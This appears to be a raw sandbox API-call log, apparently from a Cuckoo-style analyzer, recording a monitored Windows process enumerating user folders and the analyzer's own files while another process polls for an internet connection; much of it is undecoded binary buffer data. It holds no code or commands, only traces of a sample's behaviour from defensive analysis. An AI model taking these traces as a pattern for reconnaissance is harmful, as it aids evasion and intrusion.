\xc73\xf2\x91\xcf\x01\xf0\x9d29oI\xcd\x01`\xa7d\xb9\xd5I\xcd\x01>\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00(\x00z\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01 \xffd(\xf2\x91\xcf\x01\xa0\x0f\x18\xbd\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:55,975 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,055 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Start Menu\Programs\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:56,055 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01 \xffd(\xf2\x91\xcf\x01\xa0\x0f\x18\xbd\xd5I\xcd\x01\xa0\x0f\x18\xbd\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01 \xffd(\xf2\x91\xcf\x01P\x9c\x87\xbd\xd5I\xcd\x01P\x9c\x87\xbd\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00C\x00C\x00E\x00S\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00c\x00e\x00s\x00s\x00o\x00r\x00i\x00e\x00s\x00e\x00t\x00x\x00\x00\x00\x00\x00\x00\x00\xd0\x11`\xb9\xd5I\xcd\x01\xf0\xb8"4\xf2\x91\xcf\x01@"\xa9\xbf\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:56,055 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,135 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Start Menu\Programs\Accessories\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:56,135 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01 \xffd(\xf2\x91\xcf\x01P\x9c\x87\xbd\xd5I\xcd\x01P\x9c\x87\xbd\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00x\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01 \xffd(\xf2\x91\xcf\x01`\x020\xd8\xd4I\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00C\x00C\x00E\x00S\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00c\x00e\x00s\x00s\x00i\x00b\x00i\x00l\x00i\x00t\x00y\x00\x80\x00\x00\x00\x00\x00\x00\x00P\x9c\x87\xbd\xd5I\xcd\x01@\xdeE4\xf2\x91\xcf\x01\x80#\x89\xbd\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:56,135 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,215 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Start Menu\Programs\Accessories\Accessibility\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:56,215 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01 \xffd(\xf2\x91\xcf\x01`\x020\xd8\xd4I\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00x\x00\x00\x00\x00\x00\x00\x00\x90.f\xb9\xd5I\xcd\x01\xe0\xcfB4\xf2\x91\xcf\x01`\x020\xd8\xd4I\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\\x01\x00\x00\x00\x00\x00\x00`\x01\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00r\x00x\x00\x00\x00\x00\x00\x00\x00`\xa7d\xb9\xd5I\xcd\x01` O4\xf2\x91\xcf\x01\xa0\xe5)\xd8\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:56,215 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,215 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,285 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:56,285 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:56,285 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:56,285 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:56,285 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:56,295 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Start Menu\Programs\Accessories\Entertainment\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:56,295 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01 \xffd(\xf2\x91\xcf\x01p\x88\x16\xbd\xd5I\xcd\x01p\x88\x16\xbd\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00x\x00\x00\x00\x00\x00\x00\x00\x00\x99a\xb9\xd5I\xcd\x01\xe0\xcfB4\xf2\x91\xcf\x01\x80-9\xd8\xd4I\xcd\x010 c\xb9\xd5I\xcd\x01T\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99a\xb9\xd5I\xcd\x01\x90\x90P4\xf2\x91\xcf\x01\xa0\x0f\x18\xbd\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:56,295 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,295 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,295 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,376 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Start Menu\Programs\Startup\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:56,376 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01\xe0\xc0O5\xf2\x91\xcf\x01\x10\x96!\x0e\xe8\x91\xcf\x01\xa0Pn5\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00p\x00\x00\x00\x00\x00\x00\x00\x90\x8cC\xc6\xe7\x91\xcf\x01\xf0\x80m6\xf2\x91\xcf\x01\xa0\xa5\xaa\xc7\xe7\x91\xcf\x01\xd0dW5\xf2\x91\xcf\x01\x11\x18\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00g\x00e\x00n\x00t\x00.\x00p\x00y\x00w\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x11`\xb9\xd5I\xcd\x01\xa0y04\xf2\x91\xcf\x01`\x020\xd8\xd4I\xcd\x01\xd0\x11`\xb9\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:56,376 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,376 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,376 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,376 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,466 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Templates\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:56,466 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01`\xa7d\xb9\xd5I\xcd\x01`d\xb7\x84\xd4I\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00x\x00\x00\x00\x00\x00\x00\x00\x00\x99a\xb9\xd5I\xcd\x01`\xa7d\xb9\xd5I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01`\xa7d\xb9\xd5I\xcd\x01\xda\x11\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00m\x00i\x00p\x00r\x00o\x00.\x00s\x00a\x00m\x00i\x00(\x00z\x00p\x00\x00\x00\x00\x00\x00\x00\xd0\x11`\xb9\xd5I\xcd\x01`\xa7d\xb9\xd5I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01 |
SUCCESS | 0x00000000 | |
| 07:44:56,466 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,466 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,466 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,476 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,696 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\*.* |
SUCCESS | 0x0016f390 | |
| 07:44:56,696 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => h\x00\x00\x00\x00\x00\x00\x00_\xf0\xfea\xaf\x91\xcf\x01\xff:Eb\xaf\x91\xcf\x01_\xd6/b\xaf\x91\xcf\x01_\xd6/b\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00/O.b\xaf\x91\xcf\x01P\xbb\xb4rX\x94\xcf\x01_\xd6/b\xaf\x91\xcf\x01_\xd6/b\xaf\x91\xcf\x012\x01\x00\x00\x00\x00\x00\x008\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00N\x00A\x00L\x00Y\x00S\x00~\x001\x00.\x00C\x00O\x00N\x00a\x00n\x00a\x00l\x00y\x00s\x00i\x00s\x00.\x00c\x00o\x00n\x00f\x00x\x00\x00\x00\x00\x00\x00\x00\x8fw\x00b\xaf\x91\xcf\x01\x8fw\x00b\xaf\x91\xcf\x01\x8fw\x00b\xaf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:56,696 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,776 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\bin\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:56,776 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xbfq\x1ab\xaf\x91\xcf\x01\xbfq\x1ab\xaf\x91\xcf\x01\xbfq\x1ab\xaf\x91\xcf\x01\xbfq\x1ab\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbfq\x1ab\xaf\x91\xcf\x01\xbfq\x1ab\xaf\x91\xcf\x01\xbfq\x1ab\xaf\x91\xcf\x01\xbfq\x1ab\xaf\x91\xcf\x01Y{\x01\x00\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00x\x00e\x00c\x00s\x00c\x00.\x00e\x00x\x00e\x00 |
SUCCESS | 0x00000000 | |
| 07:44:56,776 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,776 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,856 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\dll\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:56,856 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x8fw\x00b\xaf\x91\xcf\x01\xf0\xac\xb1rX\x94\xcf\x01\xf0\xac\xb1rX\x94\xcf\x01\xf0\xac\xb1rX\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00x\x00\x00\x00\x00\x00\x00\x00\xef\x85\x03b\xaf\x91\xcf\x01 4\xb3rX\x94\xcf\x01\x1f \x05b\xaf\x91\xcf\x01\x1f \x05b\xaf\x91\xcf\x01\x00\x06\x04\x00\x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00U\x00C\x00K\x00O\x00O\x00~\x002\x00.\x00D\x00L\x00L\x00c\x00u\x00c\x00k\x00o\x00o\x00m\x00o\x00n\x00.\x00d\x00l\x00l\x00\x88\x00\x00\x00\x00\x00\x00\x00\x8fw\x00b\xaf\x91\xcf\x01\xef\x85\x03b\xaf\x91\xcf\x01\xef\x85\x03b\xaf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:56,856 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:56,856 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:56,936 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\lib\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:56,936 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00O\x94\x06b\xaf\x91\xcf\x01/@;c\xaf\x91\xcf\x01/@;c\xaf\x91\xcf\x01/@;c\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00h\x00\x00\x00\x00\x00\x00\x00\x7f\x1b\x08b\xaf\x91\xcf\x01@\x93ZrX\x94\xcf\x01@\x93ZrX\x94\xcf\x01@\x93ZrX\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00p\x00i\x00k\x00o\x00p\x00\x00\x00\x00\x00\x00\x00\xaf\xa2 b\xaf\x91\xcf\x01\x7f\xf2Ec\xaf\x91\xcf\x01\x7f\xf2Ec\xaf\x91\xcf\x01\x7f\xf2Ec\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:56,936 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,016 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\lib\api\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:57,016 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x7f\x1b\x08b\xaf\x91\xcf\x01@\x93ZrX\x94\xcf\x01@\x93ZrX\x94\xcf\x01@\x93ZrX\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00\x7f\x1b\x08b\xaf\x91\xcf\x01\x7f\x1b\x08b\xaf\x91\xcf\x01\x7f\x1b\x08b\xaf\x91\xcf\x01\x7f\x1b\x08b\xaf\x91\xcf\x01\xff>\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x00r\x00o\x00c\x00e\x00s\x00s\x00.\x00p\x00y\x00n\x00 \x00D\x00x\x00\x00\x00\x00\x00\x00\x00_\xc7<c\xaf\x91\xcf\x01_\xc7<c\xaf\x91\xcf\x01_\xc7<c\xaf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:57,016 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,016 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,087 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:57,087 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:57,087 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:57,087 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:57,087 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:57,097 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\lib\common\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:57,097 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xaf\xa2 b\xaf\x91\xcf\x01\x7f\xf2Ec\xaf\x91\xcf\x01\x7f\xf2Ec\xaf\x91\xcf\x01\x7f\xf2Ec\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00\xcf\xcd\x12b\xaf\x91\xcf\x01\xcf\xcd\x12b\xaf\x91\xcf\x01\xcf\xcd\x12b\xaf\x91\xcf\x01\xcf\xcd\x12b\xaf\x91\xcf\x01i\x0b\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x16\x00A\x00B\x00S\x00T\x00R\x00A\x00~\x001\x00.\x00P\x00Y\x00\x00\x00a\x00b\x00s\x00t\x00r\x00a\x00c\x00t\x00s\x00.\x00p\x00y\x00D\x00x\x00\x00\x00\x00\x00\x00\x00\x7f\xf2Ec\xaf\x91\xcf\x01\x7f\xf2Ec\xaf\x91\xcf\x01\x7f\xf2Ec\xaf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:57,097 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,097 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,177 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\lib\core\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:57,177 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00/\xdc\x15b\xaf\x91\xcf\x01\xafyGc\xaf\x91\xcf\x01\xafyGc\xaf\x91\xcf\x01\xafyGc\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arp\x00\x00\x00\x00\x00\x00\x00_c\x17b\xaf\x91\xcf\x01_c\x17b\xaf\x91\xcf\x01_c\x17b\xaf\x91\xcf\x01_c\x17b\xaf\x91\xcf\x01\xbc\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x00o\x00n\x00f\x00i\x00g\x00.\x00p\x00y\x00x\x00\x00\x00\x00\x00\x00\x00OkDc\xaf\x91\xcf\x01OkDc\xaf\x91\xcf\x01OkDc\xaf\x91\xcf\x01OkDc\xaf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:57,177 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,177 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,177 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,257 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\modules\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:57,257 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xbfq\x1ab\xaf\x91\xcf\x01p4+rX\x94\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00p\x00\x00\x00\x00\x00\x00\x00\xbfq\x1ab\xaf\x91\xcf\x01\x10\x99@rX\x94\xcf\x01\x10\x99@rX\x94\xcf\x01\x10\x99@rX\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00U\x00X\x00I\x00L\x00I\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00u\x00x\x00i\x00l\x00i\x00a\x00r\x00y\x00p\x00\x00\x00\x00\x00\x00\x00\xef\xf8\x1bb\xaf\x91\xcf\x01p4+rX\x94\xcf\x01p4+rX\x94\xcf\x01p4+rX\x94\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:57,257 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,337 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\modules\auxiliary\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:57,337 | 504 | NtQueryDirectoryFile |
